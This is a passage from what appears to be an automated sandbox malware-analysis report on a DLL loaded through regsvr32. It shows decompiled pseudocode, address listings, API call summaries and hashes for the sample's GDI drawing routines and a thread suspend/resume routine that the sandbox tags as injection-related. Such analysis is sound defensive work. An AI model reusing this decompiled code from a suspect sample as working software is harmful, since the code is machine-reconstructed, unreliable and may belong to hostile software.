					if(_t65 != 0) {
						_t69 = CreateCompatibleDC(_a12);
						_t102 = SelectObject;
						_t79 = _t69;
						_v12 = SelectObject(_t79, _v8);
						StretchDIBits(_t79, 0, 0, _a4, _a8, 0, 0, _a4, _a8, _v16 + 0x28 + (1 << _t104->bmiHeader.biBitCount) * 4, _t104, 0, 0xcc0020);
						SelectObject(_t79, _v12);
						DeleteDC(_t79);
					}
					ReleaseDC(0, _a12);
					_push(_t104);
					E1003B59D(_t79, _t102, _t104, 0);
					FreeResource(_v20);
					_t53 = _v8;
					goto L16;
				}
			}





























                                                                                                                0x10026f5d
                                                                                                                0x10026f65
                                                                                                                0x10026f68
                                                                                                                0x100270cf
                                                                                                                0x100270cf
                                                                                                                0x10026f70
                                                                                                                0x10026f76
                                                                                                                0x10026f7a
                                                                                                                0x10026f7d
                                                                                                                0x100270cd
                                                                                                                0x00000000
                                                                                                                0x100270cd
                                                                                                                0x10026f83
                                                                                                                0x10026f87
                                                                                                                0x10026f8b
                                                                                                                0x10026f90
                                                                                                                0x10026f95
                                                                                                                0x100270cb
                                                                                                                0x00000000
                                                                                                                0x10026f9b
                                                                                                                0x10026f9f
                                                                                                                0x10026fac
                                                                                                                0x10026fb1
                                                                                                                0x10026fb5
                                                                                                                0x10026fb8
                                                                                                                0x10026fbb
                                                                                                                0x10026fbe
                                                                                                                0x10026fc0
                                                                                                                0x10026fc2
                                                                                                                0x10026fc5
                                                                                                                0x10026fce
                                                                                                                0x10026fd2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10026fd4
                                                                                                                0x10026fd6
                                                                                                                0x10026fda
                                                                                                                0x10026fee
                                                                                                                0x10026ffe
                                                                                                                0x10027001
                                                                                                                0x1002700f
                                                                                                                0x1002701e
                                                                                                                0x1002701e
                                                                                                                0x10027021
                                                                                                                0x10027023
                                                                                                                0x10026fdc
                                                                                                                0x10026fdc
                                                                                                                0x10026fe4
                                                                                                                0x10026fe6
                                                                                                                0x10026fe6
                                                                                                                0x10026fe4
                                                                                                                0x10027026
                                                                                                                0x10027026
                                                                                                                0x10027029
                                                                                                                0x1002702f
                                                                                                                0x10027032
                                                                                                                0x10027037
                                                                                                                0x1002703a
                                                                                                                0x1002703d
                                                                                                                0x10027046
                                                                                                                0x10027049
                                                                                                                0x10027051
                                                                                                                0x10027054
                                                                                                                0x10027059
                                                                                                                0x10027062
                                                                                                                0x10027068
                                                                                                                0x1002707d
                                                                                                                0x1002709a
                                                                                                                0x100270a4
                                                                                                                0x100270a7
                                                                                                                0x100270a7
                                                                                                                0x100270b2
                                                                                                                0x100270b8
                                                                                                                0x100270b9
                                                                                                                0x100270c2
                                                                                                                0x100270c8
                                                                                                                0x00000000
                                                                                                                0x100270c8

                                                                                                                APIs
                                                                                                                • LoadResource.KERNEL32(?,?), ref: 10026F5D
                                                                                                                • LockResource.KERNEL32(00000000), ref: 10026F70
                                                                                                                • _malloc.LIBCMT ref: 10026F8B
                                                                                                                  • Part of subcall function 1003B4DA: __FF_MSGBANNER.LIBCMT ref: 1003B4FD
                                                                                                                  • Part of subcall function 1003B4DA: __NMSG_WRITE.LIBCMT ref: 1003B504
                                                                                                                  • Part of subcall function 1003B4DA: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,10046716,?,00000001,00000001,10043228,00000018,10069028,0000000C,100432B7,00000001), ref: 1003B552
                                                                                                                  • Part of subcall function 100161B4: _memcpy_s.LIBCMT ref: 100161C4
                                                                                                                • GetSysColor.USER32 ref: 10026FF7
                                                                                                                • GetSysColor.USER32 ref: 10027001
                                                                                                                • GetSysColor.USER32 ref: 10027013
                                                                                                                • GetDC.USER32(00000000), ref: 1002703D
                                                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 10027049
                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 10027059
                                                                                                                • SelectObject.GDI32(00000000,?), ref: 1002706B
                                                                                                                • StretchDIBits.GDI32(00000000,00000000,00000000,00000008,00000010,00000000,00000000,00000008,00000010,?,00000000,00000000,00CC0020), ref: 1002709A
                                                                                                                • SelectObject.GDI32(00000000,00000008), ref: 100270A4
                                                                                                                • DeleteDC.GDI32(00000000), ref: 100270A7
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 100270B2
                                                                                                                • FreeResource.KERNEL32(00000000), ref: 100270C2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ColorResource$CompatibleCreateObjectSelect$AllocateBitmapBitsDeleteFreeHeapLoadLockReleaseStretch_malloc_memcpy_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 2870220007-0
                                                                                                                • Opcode ID: 932c64eb8eb1807fe5a179f52783c9bc902c822c0fd8cf1ffe2fc1f6be497539
                                                                                                                • Instruction ID: 13da0a14aeafbeb5acb813e38c8887ee3a3bc1eec43f6851fe9542ec9df1e041
                                                                                                                • Opcode Fuzzy Hash: 932c64eb8eb1807fe5a179f52783c9bc902c822c0fd8cf1ffe2fc1f6be497539
                                                                                                                • Instruction Fuzzy Hash: 13416A75900218EFEB41DFA5DC84DAE7BB9FF48350F108429F91997261DB31DA14DB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10014DC0 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 184windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 91%
                                                                                                                			E10014DC0(struct HDC__* _a4) {
				int _v4;
				int _v12;
				void _v40;
				int _v44;
				int _v48;
				struct HDC__* _v52;
				char _v56;
				struct HDC__* _v64;
				void* _v68;
				int _v80;
				int _v84;
				char _v104;
				char _v112;
				signed int _t85;
				intOrPtr _t89;
				struct HDC__* _t90;
				void* _t97;
				void* _t109;
				int _t123;
				signed int _t129;
				signed short _t155;
				struct HDC__* _t160;
				int _t162;
				void* _t165;

				_push(0xffffffff);
				_push(E10052880);
				_push( *[fs:0x0]);
				_push(_t123);
				_push(1);
				_t85 =  *0x1006dbdc; // 0xdf7c0cda
				_push(_t85 ^ _t165 - 0x00000034);
				 *[fs:0x0] =  &_v12;
				_t160 = _a4;
				while(1) {
					_t162 = 0;
					if( *((intOrPtr*)(_t160 + 0x1c)) >= 5) {
						 *((intOrPtr*)(_t160 + 0x1c)) = 0;
					}
					E10023F76( &_v52);
					_t89 =  *((intOrPtr*)(_t160 + 0x20));
					_t168 = _t89 - _t162;
					_v4 = _t162;
					if(_t89 != _t162) {
						_t90 =  *(_t89 + 4);
					} else {
						_t90 = 0;
					}
					E1002452E( &_v56, 1, _t162, CreateCompatibleDC(_t90));
					_v64 = _t162;
					_v68 = 0x100572e4;
					_v12 = 1;
					_t155 =  *((intOrPtr*)(_t160 + 0x1c)) + 0xaf;
					E100247F5( &_v68, _t155, _t162, LoadBitmapA( *(E10023187(_t123, _t155, _t160, _t168) + 0xc), _t155 & 0x0000ffff));
					_t97 = _v68;
					if(_t97 != _t162) {
						SelectObject(_v52, _t97);
						_t97 = _v68;
					}
					GetObjectA(_t97, 0x18,  &_v40);
					_t123 = GetSystemMetrics(_t162);
					_v80 = _t123;
					_t129 = GetSystemMetrics(1);
					_v12 = _t129;
					if( *(_t160 + 0x14) > (0x66666667 * _t123 >> 0x20 >> 1 >> 0x1f) + (0x66666667 * _t123 >> 0x20 >> 1)) {
						 *(_t160 + 0x14) = _t162;
					}
					if( *(_t160 + 0x18) > (0x66666667 * _t129 >> 0x20 >> 1 >> 0x1f) + (0x66666667 * _t129 >> 0x20 >> 1)) {
						 *(_t160 + 0x18) = _t162;
					}
					if( *(_t160 + 0x10) > 1) {
						 *(_t160 + 0x10) = _t162;
					}
					_t109 =  *(_t160 + 0x10) - _t162;
					if(_t109 == 0) {
						goto L21;
					}
					if(_t109 != 1) {
						L26:
						 *(_t160 + 0x14) =  *(_t160 + 0x14) + 0x3c;
						 *(_t160 + 0x18) =  *(_t160 + 0x18) + 0x14;
						 *(_t160 + 0x10) =  *(_t160 + 0x10) + 1;
						Sleep(0xbb8);
						BitBlt( *( *((intOrPtr*)(_t160 + 0x20)) + 4), _t162, _t162, _v80, _v12, _v64, _t162, _t162, 0x42);
						E10024592( &_v104);
						 *((intOrPtr*)(_t160 + 0x1c)) =  *((intOrPtr*)(_t160 + 0x1c)) + 1;
						_v56 = 0;
						_v112 = 0x100572c4;
						E10024848( &_v112);
						_v56 = 0xffffffff;
						E100245A8( &_v104);
						continue;
					}
					_t123 = _v44;
					 *(_t160 + 0xc) = _t123;
					if(_t123 <= _t162) {
						goto L26;
					}
					while(1) {
						BitBlt(_a4,  *(_t160 + 0x14),  *(_t160 + 0x18), _v48, _t123, _v64,  *(_t160 + 8),  *(_t160 + 0xc), 0xcc0020);
						 *(_t160 + 0xc) =  *(_t160 + 0xc) + 0xffffffff;
						if( *(_t160 + 0xc) <= 0) {
							break;
						}
						_t123 = _v80;
					}
					L25:
					_t162 = 0;
					goto L26;
					L21:
					_t123 = _v48;
					__eflags = _t123 - _t162;
					 *(_t160 + 8) = _t123;
					if(_t123 <= _t162) {
						goto L26;
					}
					while(1) {
						BitBlt(_a4,  *(_t160 + 0x14),  *(_t160 + 0x18), _t123, _v44, _v64,  *(_t160 + 8),  *(_t160 + 0xc), 0xcc0020);
						 *(_t160 + 8) =  *(_t160 + 8) + 0xffffffff;
						__eflags =  *(_t160 + 8);
						if( *(_t160 + 8) <= 0) {
							goto L25;
						}
						_t123 = _v84;
					}
					goto L25;
				}
			}



























                                                                                                                0x10014dc0
                                                                                                                0x10014dc2
                                                                                                                0x10014dcd
                                                                                                                0x10014dd1
                                                                                                                0x10014dd4
                                                                                                                0x10014dd5
                                                                                                                0x10014ddc
                                                                                                                0x10014de1
                                                                                                                0x10014de7
                                                                                                                0x10014df0
                                                                                                                0x10014df0
                                                                                                                0x10014df6
                                                                                                                0x10014df8
                                                                                                                0x10014df8
                                                                                                                0x10014dff
                                                                                                                0x10014e04
                                                                                                                0x10014e07
                                                                                                                0x10014e09
                                                                                                                0x10014e0d
                                                                                                                0x10014e13
                                                                                                                0x10014e0f
                                                                                                                0x10014e0f
                                                                                                                0x10014e0f
                                                                                                                0x10014e22
                                                                                                                0x10014e27
                                                                                                                0x10014e2b
                                                                                                                0x10014e36
                                                                                                                0x10014e3b
                                                                                                                0x10014e59
                                                                                                                0x10014e5e
                                                                                                                0x10014e64
                                                                                                                0x10014e6c
                                                                                                                0x10014e72
                                                                                                                0x10014e72
                                                                                                                0x10014e7e
                                                                                                                0x10014e8d
                                                                                                                0x10014e91
                                                                                                                0x10014e97
                                                                                                                0x10014eac
                                                                                                                0x10014eb0
                                                                                                                0x10014eb2
                                                                                                                0x10014eb2
                                                                                                                0x10014ec8
                                                                                                                0x10014eca
                                                                                                                0x10014eca
                                                                                                                0x10014ed1
                                                                                                                0x10014ed3
                                                                                                                0x10014ed3
                                                                                                                0x10014ed9
                                                                                                                0x10014edb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10014ee0
                                                                                                                0x10014f8d
                                                                                                                0x10014f8d
                                                                                                                0x10014f91
                                                                                                                0x10014f9a
                                                                                                                0x10014fa2
                                                                                                                0x10014fc4
                                                                                                                0x10014fce
                                                                                                                0x10014fd3
                                                                                                                0x10014fda
                                                                                                                0x10014fdf
                                                                                                                0x10014fe7
                                                                                                                0x10014ff0
                                                                                                                0x10014ff8
                                                                                                                0x00000000
                                                                                                                0x10014ff8
                                                                                                                0x10014ee6
                                                                                                                0x10014eec
                                                                                                                0x10014eef
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10014f04
                                                                                                                0x10014f2b
                                                                                                                0x10014f31
                                                                                                                0x10014f39
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10014f00
                                                                                                                0x10014f00
                                                                                                                0x10014f8b
                                                                                                                0x10014f8b
                                                                                                                0x00000000
                                                                                                                0x10014f3d
                                                                                                                0x10014f3d
                                                                                                                0x10014f41
                                                                                                                0x10014f43
                                                                                                                0x10014f46
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10014f54
                                                                                                                0x10014f7b
                                                                                                                0x10014f81
                                                                                                                0x10014f85
                                                                                                                0x10014f89
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10014f50
                                                                                                                0x10014f50
                                                                                                                0x00000000
                                                                                                                0x10014f54

                                                                                                                APIs
                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 10014E17
                                                                                                                • LoadBitmapA.USER32 ref: 10014E4E
                                                                                                                • SelectObject.GDI32(?,?), ref: 10014E6C
                                                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 10014E7E
                                                                                                                • GetSystemMetrics.USER32 ref: 10014E8B
                                                                                                                • GetSystemMetrics.USER32 ref: 10014E95
                                                                                                                • BitBlt.GDI32(?,0000003C,00000014,?,?,?,?,?,00CC0020), ref: 10014F2B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MetricsObjectSystem$BitmapCompatibleCreateLoadSelect
                                                                                                                • String ID: gfff$gfff
                                                                                                                • API String ID: 2961984297-3084402119
                                                                                                                • Opcode ID: ac3882323fa1f9907e88c189e5f53906dab6768ff79bb1aade700cb96182447b
                                                                                                                • Instruction ID: 9e04ff40dbcebb2e158ec9be94f1c2a7de3d33684d6e6af9c12f35c4c222073b
                                                                                                                • Opcode Fuzzy Hash: ac3882323fa1f9907e88c189e5f53906dab6768ff79bb1aade700cb96182447b
                                                                                                                • Instruction Fuzzy Hash: F36178B51047459FC320CF69D98491BB7F8FB88310F118A1DF5968B6A1DB70F945CBA2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10024D04 Relevance: 19.7, APIs: 13, Instructions: 231windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 98%
                                                                                                                			E10024D04(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t135;
				intOrPtr _t194;
				intOrPtr* _t228;
				void* _t230;
				intOrPtr _t233;

				_push(0x38);
				E1003D1E6(E10053A08, __ebx, __edi, __esi);
				_t228 = __ecx;
				 *((intOrPtr*)(_t230 - 0x30)) = 0;
				 *((intOrPtr*)(_t230 - 0x34)) = 0x1005bb60;
				 *(_t230 - 4) = 0;
				 *((intOrPtr*)(_t230 - 0x28)) = 0;
				 *((intOrPtr*)(_t230 - 0x2c)) = 0x1005bb60;
				 *((intOrPtr*)(_t230 - 0x20)) = 0;
				 *((intOrPtr*)(_t230 - 0x24)) = 0x1005bb60;
				 *(_t230 - 4) = 2;
				E10024AE5(_t230 - 0x2c,  *(_t230 + 8));
				CopyRect(_t230 - 0x44,  *(_t230 + 8));
				InflateRect(_t230 - 0x44,  ~( *(_t230 + 0xc)),  ~( *(_t230 + 0x10)));
				IntersectRect(_t230 - 0x44, _t230 - 0x44,  *(_t230 + 8));
				E100247F5(_t230 - 0x24, 0x1005bb60, _t230, CreateRectRgnIndirect(_t230 - 0x44));
				E100247F5(_t230 - 0x34, 0x1005bb60, _t230, CreateRectRgn(0, 0, 0, 0));
				E10024B19(_t230 - 0x34, _t230 - 0x2c, _t230 - 0x24, 3);
				_t232 =  *((intOrPtr*)(_t230 + 0x20));
				if( *((intOrPtr*)(_t230 + 0x20)) == 0) {
					 *((intOrPtr*)(_t230 + 0x20)) = E10024C61(0, 0x1005bb60, _t228, _t232);
				}
				_t194 =  *((intOrPtr*)(_t230 + 0x20));
				_t233 = _t194;
				_t234 = _t233 == 0;
				if(_t233 == 0) {
					E1001729E(0, _t194, 0x1005bb60, _t228, _t234);
				}
				if( *((intOrPtr*)(_t230 + 0x24)) == 0) {
					 *((intOrPtr*)(_t230 + 0x24)) = _t194;
				}
				 *((intOrPtr*)(_t230 - 0x18)) = 0;
				 *((intOrPtr*)(_t230 - 0x1c)) = 0x1005bb60;
				 *((intOrPtr*)(_t230 - 0x10)) = 0;
				 *((intOrPtr*)(_t230 - 0x14)) = 0x1005bb60;
				 *(_t230 - 4) = 4;
				if( *(_t230 + 0x14) != 0) {
					E100247F5(_t230 - 0x1c, CreateRectRgn, _t230, CreateRectRgn(0, 0, 0, 0));
					E10024AFE(_t230 - 0x2c,  *(_t230 + 0x14));
					CopyRect(_t230 - 0x44,  *(_t230 + 0x14));
					InflateRect(_t230 - 0x44,  ~( *(_t230 + 0x18)),  ~( *(_t230 + 0x1c)));
					IntersectRect(_t230 - 0x44, _t230 - 0x44,  *(_t230 + 0x14));
					E10024AFE(_t230 - 0x24, _t230 - 0x44);
					E10024B19(_t230 - 0x1c, _t230 - 0x2c, _t230 - 0x24, 3);
					if( *((intOrPtr*)( *((intOrPtr*)(_t230 + 0x20)) + 4)) ==  *((intOrPtr*)( *((intOrPtr*)(_t230 + 0x24)) + 4))) {
						E100247F5(_t230 - 0x14, CreateRectRgn, _t230, CreateRectRgn(0, 0, 0, 0));
						E10024B19(_t230 - 0x14, _t230 - 0x1c, _t230 - 0x34, 3);
					}
				}
				if( *((intOrPtr*)( *((intOrPtr*)(_t230 + 0x20)) + 4)) !=  *((intOrPtr*)( *((intOrPtr*)(_t230 + 0x24)) + 4)) &&  *(_t230 + 0x14) != 0) {
					E10024234(_t228, _t230 - 0x1c);
					 *((intOrPtr*)( *_t228 + 0x50))(_t230 - 0x44);
					 *(_t230 + 0x14) = E100248CD(_t228,  *((intOrPtr*)(_t230 + 0x24)));
					PatBlt( *(_t228 + 4),  *(_t230 - 0x44),  *(_t230 - 0x40),  *((intOrPtr*)(_t230 - 0x3c)) -  *(_t230 - 0x44),  *((intOrPtr*)(_t230 - 0x38)) -  *(_t230 - 0x40), 0x5a0049);
					E100248CD(_t228,  *(_t230 + 0x14));
				}
				_t135 = _t230 - 0x14;
				if( *((intOrPtr*)(_t230 - 0x10)) == 0) {
					_t135 = _t230 - 0x34;
				}
				E10024234(_t228, _t135);
				 *((intOrPtr*)( *_t228 + 0x50))(_t230 - 0x44);
				 *(_t230 + 0x14) = E100248CD(_t228,  *((intOrPtr*)(_t230 + 0x20)));
				PatBlt( *(_t228 + 4),  *(_t230 - 0x44),  *(_t230 - 0x40),  *((intOrPtr*)(_t230 - 0x3c)) -  *(_t230 - 0x44),  *((intOrPtr*)(_t230 - 0x38)) -  *(_t230 - 0x40), 0x5a0049);
				if( *(_t230 + 0x14) != 0) {
					E100248CD(_t228,  *(_t230 + 0x14));
				}
				E10024234(_t228, 0);
				 *(_t230 - 4) = 3;
				 *((intOrPtr*)(_t230 - 0x14)) = 0x100572c4;
				E10024848(_t230 - 0x14);
				 *(_t230 - 4) = 2;
				 *((intOrPtr*)(_t230 - 0x1c)) = 0x100572c4;
				E10024848(_t230 - 0x1c);
				 *(_t230 - 4) = 1;
				 *((intOrPtr*)(_t230 - 0x24)) = 0x100572c4;
				E10024848(_t230 - 0x24);
				 *(_t230 - 4) = 0;
				 *((intOrPtr*)(_t230 - 0x2c)) = 0x100572c4;
				E10024848(_t230 - 0x2c);
				 *(_t230 - 4) =  *(_t230 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t230 - 0x34)) = 0x100572c4;
				return E1003D2BE(E10024848(_t230 - 0x34));
			}








                                                                                                                0x10024d04
                                                                                                                0x10024d0b
                                                                                                                0x10024d10
                                                                                                                0x10024d19
                                                                                                                0x10024d1c
                                                                                                                0x10024d1f
                                                                                                                0x10024d22
                                                                                                                0x10024d25
                                                                                                                0x10024d28
                                                                                                                0x10024d2b
                                                                                                                0x10024d34
                                                                                                                0x10024d38
                                                                                                                0x10024d44
                                                                                                                0x10024d5a
                                                                                                                0x10024d68
                                                                                                                0x10024d7c
                                                                                                                0x10024d8f
                                                                                                                0x10024da1
                                                                                                                0x10024da6
                                                                                                                0x10024da9
                                                                                                                0x10024db0
                                                                                                                0x10024db0
                                                                                                                0x10024db3
                                                                                                                0x10024db8
                                                                                                                0x10024dbd
                                                                                                                0x10024dbf
                                                                                                                0x10024dc1
                                                                                                                0x10024dc1
                                                                                                                0x10024dc9
                                                                                                                0x10024dcb
                                                                                                                0x10024dcb
                                                                                                                0x10024dce
                                                                                                                0x10024dd1
                                                                                                                0x10024dd4
                                                                                                                0x10024dd7
                                                                                                                0x10024ddd
                                                                                                                0x10024de1
                                                                                                                0x10024df7
                                                                                                                0x10024e02
                                                                                                                0x10024e0e
                                                                                                                0x10024e24
                                                                                                                0x10024e32
                                                                                                                0x10024e3f
                                                                                                                0x10024e51
                                                                                                                0x10024e62
                                                                                                                0x10024e6e
                                                                                                                0x10024e80
                                                                                                                0x10024e80
                                                                                                                0x10024e62
                                                                                                                0x10024e97
                                                                                                                0x10024ea4
                                                                                                                0x10024eb1
                                                                                                                0x10024ec4
                                                                                                                0x10024edd
                                                                                                                0x10024ee4
                                                                                                                0x10024ee4
                                                                                                                0x10024eec
                                                                                                                0x10024eef
                                                                                                                0x10024ef1
                                                                                                                0x10024ef1
                                                                                                                0x10024ef7
                                                                                                                0x10024f04
                                                                                                                0x10024f17
                                                                                                                0x10024f30
                                                                                                                0x10024f35
                                                                                                                0x10024f3c
                                                                                                                0x10024f3c
                                                                                                                0x10024f44
                                                                                                                0x10024f51
                                                                                                                0x10024f55
                                                                                                                0x10024f58
                                                                                                                0x10024f60
                                                                                                                0x10024f64
                                                                                                                0x10024f67
                                                                                                                0x10024f6f
                                                                                                                0x10024f73
                                                                                                                0x10024f76
                                                                                                                0x10024f7e
                                                                                                                0x10024f81
                                                                                                                0x10024f84
                                                                                                                0x10024f89
                                                                                                                0x10024f90
                                                                                                                0x10024f9d

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10024D0B
                                                                                                                  • Part of subcall function 10024AE5: CreateRectRgnIndirect.GDI32(?), ref: 10024AEC
                                                                                                                • CopyRect.USER32(?,?), ref: 10024D44
                                                                                                                • InflateRect.USER32 ref: 10024D5A
                                                                                                                • IntersectRect.USER32(?,?,?), ref: 10024D68
                                                                                                                • CreateRectRgnIndirect.GDI32(?), ref: 10024D72
                                                                                                                • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 10024D85
                                                                                                                  • Part of subcall function 10024B19: CombineRgn.GDI32(?,?,00000002,?), ref: 10024B3C
                                                                                                                • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 10024DF1
                                                                                                                • CopyRect.USER32(?,?), ref: 10024E0E
                                                                                                                • InflateRect.USER32 ref: 10024E24
                                                                                                                • IntersectRect.USER32(?,?,?), ref: 10024E32
                                                                                                                • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 10024E68
                                                                                                                  • Part of subcall function 10024C61: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,?), ref: 10024CA7
                                                                                                                  • Part of subcall function 10024C61: CreatePatternBrush.GDI32(00000000), ref: 10024CB4
                                                                                                                  • Part of subcall function 10024C61: DeleteObject.GDI32(00000000), ref: 10024CC0
                                                                                                                • PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 10024EDD
                                                                                                                  • Part of subcall function 100248CD: SelectObject.GDI32(?,00000000), ref: 100248EF
                                                                                                                  • Part of subcall function 100248CD: SelectObject.GDI32(?,00000004), ref: 10024905
                                                                                                                • PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 10024F30
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Create$Object$CopyIndirectInflateIntersectSelect$BitmapBrushCombineDeleteH_prolog3Pattern
                                                                                                                • String ID:
                                                                                                                • API String ID: 3342639795-0
                                                                                                                • Opcode ID: 038537a44a8000c016f0801a7796dbb464ad61361ae68357e3d626c0f94f19d1
                                                                                                                • Instruction ID: 35fdaccf589770054e1f4c58ce5c3dc5ce86ec9ee3b598ed1abc9f1a20bc61fe
                                                                                                                • Opcode Fuzzy Hash: 038537a44a8000c016f0801a7796dbb464ad61361ae68357e3d626c0f94f19d1
                                                                                                                • Instruction Fuzzy Hash: 899102B590014EAFCF05DFA4EA958EEBBB9FF08204F52411AF406A3251DF34AE05CB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000C640 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 189threadinjectionCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 89%
                                                                                                                			E1000C640(signed int __ecx, void* __edx) {
				long _v4;
				char _v12;
				char _v24;
				char _v28;
				char _v32;
				long _v36;
				char _v40;
				void* __edi;
				signed int _t53;
				int _t58;
				intOrPtr* _t59;
				signed int _t64;
				intOrPtr* _t79;
				signed int _t84;
				intOrPtr* _t93;
				signed int _t118;
				signed int _t132;
				void* _t138;
				signed int _t156;
				void* _t161;
				signed int _t162;
				intOrPtr* _t166;
				intOrPtr* _t173;

				_t138 = __edx;
				_push(0xffffffff);
				_push(E10051920);
				_push( *[fs:0x0]);
				_t162 = _t161 - 0x18;
				_t53 =  *0x1006dbdc; // 0xdf7c0cda
				_push(_t53 ^ _t162);
				 *[fs:0x0] =  &_v12;
				_t156 = __ecx;
				_v36 = 0;
				if(GetExitCodeThread( *(__ecx + 0x290),  &_v36) == 0 || _v36 != 0x103) {
					L9:
					_t139 =  *(_t156 + 0x294);
					_t58 = GetExitCodeThread( *(_t156 + 0x294),  &_v36);
					if(_t58 != 0 && _v36 == 0x103) {
						_t59 = E100173A6();
						_t173 = _t59;
						_t111 = 0 | _t173 == 0x00000000;
						if(_t173 == 0) {
							_t59 = E10001000(_t111, _t139, 0x80004005);
						}
						_v28 =  *((intOrPtr*)( *((intOrPtr*)( *_t59 + 0xc))))() + 0x10;
						_t153 = _t156 + 0x400;
						_v4 = 1;
						E1001ADCC(_t156 + 0x400, _t156 + 0x400,  &_v28);
						_t64 = E1003BD06(_v32, 0x10058344);
						_t162 = _t162 + 8;
						if((_t64 & 0xffffff00 | _t64 == 0x00000000) == 0) {
							ResumeThread( *(_t156 + 0x294));
							ResumeThread( *(_t156 + 0x28c));
							E1001D2C4(_t153, 0x10058344);
							E10001310( &_v24, "Searching");
							_t118 =  &_v32;
							E1001614A(_t118);
						} else {
							SuspendThread( *(_t156 + 0x294));
							SuspendThread( *(_t156 + 0x28c));
							E1001D2C4(_t153, 0x10058450);
							_t118 = _t156;
							E1000BDC0(_t118);
						}
						_t58 = _v28 + 0xfffffff0;
						_v4 = 0xffffffff;
						asm("lock xadd [edx], ecx");
						if((_t118 | 0xffffffff) - 1 <= 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t58)) + 4))))(_t58);
						}
					}
					 *[fs:0x0] = _v12;
					return _t58;
				} else {
					_t79 = E100173A6();
					_t166 = _t79;
					_t125 = 0 | _t166 == 0x00000000;
					if(_t166 == 0) {
						_t79 = E10001000(_t125, _t138, 0x80004005);
					}
					_v32 =  *((intOrPtr*)( *((intOrPtr*)( *_t79 + 0xc))))() + 0x10;
					_v4 = 0;
					_t154 = _t156 + 0x400;
					E1001ADCC(_t156 + 0x400, _t156 + 0x400,  &_v32);
					_t84 = E1003BD06(_v36, 0x10058344);
					_t162 = _t162 + 8;
					if((_t84 & 0xffffff00 | _t84 == 0x00000000) == 0) {
						ResumeThread( *(_t156 + 0x290));
						ResumeThread( *(_t156 + 0x28c));
						E1001D2C4(_t154, 0x10058344);
						E10001310( &_v32, "Searching");
						_t132 =  &_v40;
						E1001614A(_t132);
					} else {
						SuspendThread( *(_t156 + 0x290));
						SuspendThread( *(_t156 + 0x28c));
						E1001D2C4(_t154, 0x10058450);
						_t132 = _t156;
